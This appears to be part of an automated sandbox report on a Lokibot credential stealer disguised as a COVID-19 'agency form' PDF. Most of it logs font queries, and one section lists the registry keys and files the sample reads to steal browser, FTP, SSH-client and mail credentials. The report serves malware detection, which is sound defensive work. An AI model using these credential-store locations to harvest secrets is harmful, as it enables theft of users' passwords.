Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\GIGI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\FORTE.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\FELIXTI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\ERASDEMI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\ERASBD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\ELEPHNTI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\ITCEDSCR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\CURLZ___.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\CENSCBK.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\CALIST.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\CALISTI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\CALISTB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\CALISTBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\BOOKOS.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\BOD_R.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\BOD_I.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\BOD_B.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\BOD_CB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\BOD_BLAI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\BOD_CBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\ITCBLKAD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\BSSYM7.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\REFSAN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\REFSPCL.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\marlett.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Code function: 6_2_00406069 GetUserNameW, 6_2_00406069
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid Jump to behavior

Stealing of Sensitive Information:

barindex
Yara detected Lokibot
Source: Yara match File source: 6.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.3896a98.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.222223728.00000000027EF000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.222793737.00000000037D9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.237286267.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe PID: 5708, type: MEMORY
Source: Yara match File source: Process Memory Space: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe PID: 3704, type: MEMORY
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Key opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl Jump to behavior
Tries to harvest and steal browser information (history, passwords, etc)
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data Jump to behavior
Tries to harvest and steal ftp login credentials
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe File opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe File opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe File opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe File opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts Jump to behavior
Tries to steal Mail credentials (via file access)
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities Jump to behavior
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook Jump to behavior
Tries to steal Mail credentials (via file registry)
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Code function: PopPassword 6_2_0040D069
Source: C:\Users\user\Desktop\RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe Code function: SmtpPassword 6_2_0040D069
Yara detected Credential Stealer
Source: Yara match File source: 6.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match File source: 0.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.3896a98.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 6.2.RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.222223728.00000000027EF000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.222793737.00000000037D9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000006.00000002.237286267.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: RECAP SARS COVID - 19 - AGENCY FORM.pdf.exe PID: 3704, type: MEMORY
  • No. of IPs < 25%
  • 25% < No. of IPs < 50%
  • 50% < No. of IPs < 75%
  • 75% < No. of IPs